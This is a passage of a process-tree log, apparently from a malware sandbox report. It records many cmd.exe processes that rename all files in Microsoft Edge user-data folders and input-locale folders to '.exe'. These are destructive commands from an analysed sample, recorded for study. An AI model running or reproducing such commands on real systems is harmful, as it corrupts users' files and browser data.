        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\*.*" "*.exe"
        5⤵
        
        PID:4760
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\*.*" "*.exe"
        5⤵
        
        PID:1844
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Speech Recognition\*.*" "*.exe"
        5⤵
        
        PID:3660
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\*.*" "*.exe"
        5⤵
        
        PID:4608
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\*.*" "*.exe"
        5⤵
        
        PID:1472
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\WidevineCdm\*.*" "*.exe"
        5⤵
        
        PID:3080
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ZxcvbnData\*.*" "*.exe"
        5⤵
        
        PID:4368
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\*.*" "*.exe"
        5⤵
        
        PID:2228
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\*.*" "*.exe"
        5⤵
        
        PID:4324
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\*.*" "*.exe"
        5⤵
        
        PID:4616
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\*.*" "*.exe"
        5⤵
        
        PID:2120
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\*.*" "*.exe"
        5⤵
        
        PID:1168
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2788
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\*.*" "*.exe"
        5⤵
        
        PID:836
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\*.*" "*.exe"
        5⤵
        
        PID:3308
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\*.*" "*.exe"
        5⤵
        
        PID:2852
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\*.*" "*.exe"
        5⤵
        
        PID:2984
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\*.*" "*.exe"
        5⤵
        
        PID:4484
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\*.*" "*.exe"
        5⤵
        
        PID:4760
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\*.*" "*.exe"
        5⤵
        
        PID:2804
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\*.*" "*.exe"
        5⤵
        
        PID:2476
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\6cbc91a3-759b-499d-9d3e-d68f4be54e8d\*.*" "*.exe"
        5⤵
        
        PID:2000
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3560
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\*.*" "*.exe"
        5⤵
        
        PID:4392
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\*.*" "*.exe"
        5⤵
        
        PID:3080
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\*.*" "*.exe"
        5⤵
        
        PID:4368
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir\*.*" "*.exe"
        5⤵
        
        PID:2624
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\*.*" "*.exe"
        5⤵
        
        PID:4616
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\*.*" "*.exe"
        5⤵
        
        PID:2648
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\*.*" "*.exe"
        5⤵
        
        PID:3556
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\*.*" "*.exe"
        5⤵
        
        PID:3988
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\*.*" "*.exe"
        5⤵
        
        PID:2348
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\*.*" "*.exe"
        5⤵
        
        PID:2344
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2992
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\*.*" "*.exe"
        5⤵
        
        PID:2176
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2116
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\af-ZA\*.*" "*.exe"
        5⤵
        
        PID:4484
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-AE\*.*" "*.exe"
        5⤵
        
        PID:4608
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-BH\*.*" "*.exe"
        5⤵
        
        PID:4972
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-DZ\*.*" "*.exe"
        5⤵
        
        PID:4860
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-EG\*.*" "*.exe"
        5⤵
        
        PID:392
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-IQ\*.*" "*.exe"
        5⤵
        
        PID:1032
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-JO\*.*" "*.exe"
        5⤵
        
        PID:3908
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-KW\*.*" "*.exe"
        5⤵
        
        PID:1616
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-LB\*.*" "*.exe"
        5⤵
        
        PID:4908
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2160
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-LY\*.*" "*.exe"
        5⤵
        
        PID:3016
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-MA\*.*" "*.exe"
        5⤵
        
        PID:3696
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-OM\*.*" "*.exe"
        5⤵
        
        PID:4616
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-QA\*.*" "*.exe"
        5⤵
        
        PID:2192
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-SA\*.*" "*.exe"
        5⤵
        
        PID:4920
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-SY\*.*" "*.exe"
        5⤵
        
        PID:2716
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-TN\*.*" "*.exe"
        5⤵
        
        PID:4856
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-YE\*.*" "*.exe"
        5⤵
        
        PID:4508
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\az-Latn-AZ\*.*" "*.exe"
        5⤵
        
        PID:2900
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\bg-BG\*.*" "*.exe"
        5⤵
        
        PID:3640
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2804
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\bn-BD\*.*" "*.exe"
        5⤵
        
        PID:3344
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ca-ES\*.*" "*.exe"
        5⤵
        
        PID:4772
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\cs-CZ\*.*" "*.exe"
        5⤵
        
        PID:4972
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\da-DK\*.*" "*.exe"
        5⤵
        
        PID:3832
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\de-AT\*.*" "*.exe"
        5⤵
        
        PID:392
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\de-CH\*.*" "*.exe"
        5⤵
        
        PID:1472
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\de-DE\*.*" "*.exe"
        5⤵
        
        PID:4376
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2400
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\de-LI\*.*" "*.exe"
        5⤵
        
        PID:1616
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\de-LU\*.*" "*.exe"
        5⤵
        
        PID:1240
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\el-GR\*.*" "*.exe"
        5⤵
        
        PID:3804
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-029\*.*" "*.exe"
        5⤵
        
        PID:3696
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-AU\*.*" "*.exe"
        5⤵
        
        PID:2748
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-BZ\*.*" "*.exe"
        5⤵
        
        PID:2168
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-CA\*.*" "*.exe"
        5⤵
        
        PID:4120
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-GB\*.*" "*.exe"
        5⤵
        
        PID:3084
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-HK\*.*" "*.exe"
        5⤵
        
        PID:1636
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-ID\*.*" "*.exe"
        5⤵
        
        PID:1940
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-IE\*.*" "*.exe"
        5⤵
        
        PID:3660
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2176
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-IN\*.*" "*.exe"
        5⤵
        
        PID:1316
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4316
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-JM\*.*" "*.exe"
        5⤵
        
        PID:3388
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-MY\*.*" "*.exe"
        5⤵
        
        PID:4780
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-NZ\*.*" "*.exe"
        5⤵
        
        PID:560
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-SG\*.*" "*.exe"
        5⤵
        
        PID:1676
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-TT\*.*" "*.exe"
        5⤵
        
        PID:4608
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-ZA\*.*" "*.exe"
        5⤵
        
        PID:2072
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-ZW\*.*" "*.exe"
        5⤵
        
        PID:4908
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-419\*.*" "*.exe"
        5⤵
        
        PID:1292
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-AR\*.*" "*.exe"
        5⤵
        
        PID:2428
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-BO\*.*" "*.exe"
        5⤵
        
        PID:708
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-CL\*.*" "*.exe"
        5⤵
        
        PID:2220
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-CO\*.*" "*.exe"
        5⤵
        
        PID:2084
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-CR\*.*" "*.exe"
        5⤵
        
        PID:4304
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-DO\*.*" "*.exe"
        5⤵
        
        PID:1368
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-EC\*.*" "*.exe"
        5⤵
        
        PID:1256
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-ES\*.*" "*.exe"
        5⤵
        
        PID:4456
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-GT\*.*" "*.exe"
        5⤵
        
        PID:1272
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-HN\*.*" "*.exe"
        5⤵
        
        PID:4880
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-MX\*.*" "*.exe"
        5⤵
        
        PID:680
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-NI\*.*" "*.exe"
        5⤵
        
        PID:4516
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-PA\*.*" "*.exe"
        5⤵
        
        PID:3388
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-PE\*.*" "*.exe"
        5⤵
        
        PID:2708
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-PR\*.*" "*.exe"
        5⤵
        
        PID:812
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-PY\*.*" "*.exe"
        5⤵
        
        PID:2184
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-SV\*.*" "*.exe"
        5⤵
        
        PID:2928
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-US\*.*" "*.exe"
        5⤵
        
        PID:4560
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-UY\*.*" "*.exe"
        5⤵
        
        PID:3020
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-VE\*.*" "*.exe"
        5⤵
        
        PID:3484
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\et-EE\*.*" "*.exe"
        5⤵
        
        PID:872
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\eu-ES\*.*" "*.exe"
        5⤵
        
        PID:4404
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fa-IR\*.*" "*.exe"
        5⤵
        
        PID:3308
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fi-FI\*.*" "*.exe"
        5⤵
        
        PID:3440
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2748
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-029\*.*" "*.exe"
        5⤵
        
        PID:4856
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-BE\*.*" "*.exe"
        5⤵
        
        PID:3848
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-CA\*.*" "*.exe"
        5⤵
        
        PID:3616
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-CD\*.*" "*.exe"
        5⤵
        
        PID:4292
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-CH\*.*" "*.exe"
        5⤵
        
        PID:4280
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-CI\*.*" "*.exe"
        5⤵
        
        PID:880
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-CM\*.*" "*.exe"
        5⤵
        
        PID:4620
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-FR\*.*" "*.exe"
        5⤵
        
        PID:4564
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-HT\*.*" "*.exe"
        5⤵
        
        PID:5020
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-LU\*.*" "*.exe"
        5⤵
        
        PID:2584
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-MA\*.*" "*.exe"
        5⤵
        
        PID:3604
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-MC\*.*" "*.exe"
        5⤵
        
        PID:4868
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-ML\*.*" "*.exe"
        5⤵
        
        PID:4860
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-RE\*.*" "*.exe"
        5⤵
        
        PID:2764
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-SN\*.*" "*.exe"
        5⤵
        
        PID:1168
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\gl-ES\*.*" "*.exe"
        5⤵
        
        PID:580
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ha-Latn-NG\*.*" "*.exe"
        5⤵
        
        PID:1616
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\he-IL\*.*" "*.exe"
        5⤵
        
        PID:2164
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\hi-IN\*.*" "*.exe"
        5⤵
        
        PID:1656
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\hr-BA\*.*" "*.exe"
        5⤵
        
        PID:2336
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\hr-HR\*.*" "*.exe"
        5⤵
        
        PID:1636
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\hu-HU\*.*" "*.exe"
        5⤵
        
        PID:1368
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\hy-AM\*.*" "*.exe"
        5⤵
        
        PID:1552
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\id-ID\*.*" "*.exe"
        5⤵
        
        PID:2348
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3640
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\it-CH\*.*" "*.exe"
        5⤵
        
        PID:2940
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\it-IT\*.*" "*.exe"
        5⤵
        
        PID:5004
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ka-GE\*.*" "*.exe"
        5⤵
        
        PID:3652
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\kk-KZ\*.*" "*.exe"
        5⤵
        
        PID:4772
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\lt-LT\*.*" "*.exe"
        5⤵
        
        PID:2944
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\lv-LV\*.*" "*.exe"
        5⤵
        
        PID:4908
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\mk-MK\*.*" "*.exe"
        5⤵
        
        PID:3908
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ms-BN\*.*" "*.exe"
        5⤵
        
        PID:2072
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ms-MY\*.*" "*.exe"
        5⤵
        
        PID:4860
